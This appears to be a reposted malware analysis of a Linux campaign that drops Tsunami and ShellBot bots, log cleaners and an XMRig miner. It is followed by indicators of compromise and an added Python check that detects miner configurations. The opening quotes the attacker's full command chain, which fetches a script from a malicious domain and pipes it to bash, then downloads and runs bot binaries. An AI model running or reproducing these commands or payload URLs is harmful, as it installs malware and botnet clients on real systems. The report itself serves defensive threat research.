```
# nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O - ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
```
Table 3. Tsunami configuration data
Figure 6. ShellBot configuration data
Figure 7. How to use MIG LogCleaner
Figure 12. XMRig execution flow
The configuration data needed for mining is stored in the "config.json" file in the same path.
– Mining Pool : monerohash[.]com:80
– user : "46WyHX3L85SAp3oKu1im7EgaVGBsWYhf7KxrebESVE6QHA5vJRab6wF1gsVkYwJfnNV2KYHU1Xq2A9XUYmWhvzPf2E6Nvse"
– pass : "nobody"
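A defender-side check for the miner configuration described above, added here as an example and not part of the original report: it parses an XMRig-style config.json and reports pool entries whose user field looks like a Monero wallet. The `pools` array with `url`/`user`/`pass` keys is XMRig's own config layout; the sample input is constructed (pool endpoint as on the page, wallet replaced by a dummy base58 string).

```python
import json
import re

# Standard Monero addresses: 95 base58 characters starting with '4'.
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")

# Constructed sample mirroring the shape of the config.json in the report
# (pool endpoint as on the page, wallet replaced by a dummy base58 string).
SAMPLE_CONFIG = json.dumps({
    "algo": "cryptonight",
    "pools": [
        {"url": "monerohash[.]com:80", "user": "4" + "A" * 94, "pass": "nobody"}
    ],
})


def miner_pools(config_text):
    """Return (url, user, pass) for each pool entry whose user field is a
    Monero wallet address; [] for non-JSON input or no usable pools list."""
    try:
        cfg = json.loads(config_text)
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        return []
    pools = cfg.get("pools") if isinstance(cfg, dict) else None
    if not isinstance(pools, list):
        return []
    hits = []
    for pool in pools:
        if not isinstance(pool, dict):
            continue
        url = str(pool.get("url", ""))
        user = str(pool.get("user", ""))
        # A host:port endpoint plus a wallet-shaped user is the miner signature.
        if ":" in url and MONERO_ADDR.match(user):
            hits.append((url, user, str(pool.get("pass", ""))))
    return hits


if __name__ == "__main__":
    for url, user, pw in miner_pools(SAMPLE_CONFIG):
        print(f"miner pool {url} wallet {user[:8]}... pass={pw!r}")
```

Run it over any config.json found in /tmp or /var/tmp; a hit with a pool endpoint and a wallet-shaped user is worth an alert even when the binary itself has been renamed.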
4. Conclusion
File detection
– Linux/CoinMiner.Gen2 (2019.07.31.08)
– Linux/Tsunami.Gen (2016.08.24.00)
– Shellbot/Perl.Generic.S1118 (2020.02.19.07)
– Downloader/Shell.Agent.SC189601 (2023.06.12.02)
– HackTool/Linux.LogWiper.22272 (2023.06.12.02)
– HackTool/Linux.LogWiper.28728 (2023.06.12.02)
– Trojan/Linux.Agent.8456 (2023.06.12.02)
– Trojan/Shell.Runner (2023.06.12.02)
– CoinMiner/Text.Config (2023.06.12.02)
C&C
– ircx.us[.]to:20 : ShellBot
– ircx.us[.]to:53 : Tsunami
– ircx.us[.]to:6667 : ShellBot
– ircxx.us[.]to:53 : Tsunami
Download
– ddoser[.]org/key : Downloader Bash script
– ddoser[.]org/a : Tsunami
– ddoser[.]org/logo : ShellBot
– ddoser[.]org/siwen/bot : ShellBot DDoS Bot
– ddoser[.]org/top : Compressed XMRig CoinMiner file
– ddoser[.]org/siwen/cls : MIG Logcleaner v2.0
– ddoser[.]org/siwen/clean : 0x333shadow Log Cleaner
– ddoser[.]org/siwen/ping6 : Privilege escalation malware
Original article:
https://asec.ahnlab.com/en/54647/
Originally published on the WeChat public account Ots安全: Tsunami DDoS malware analysis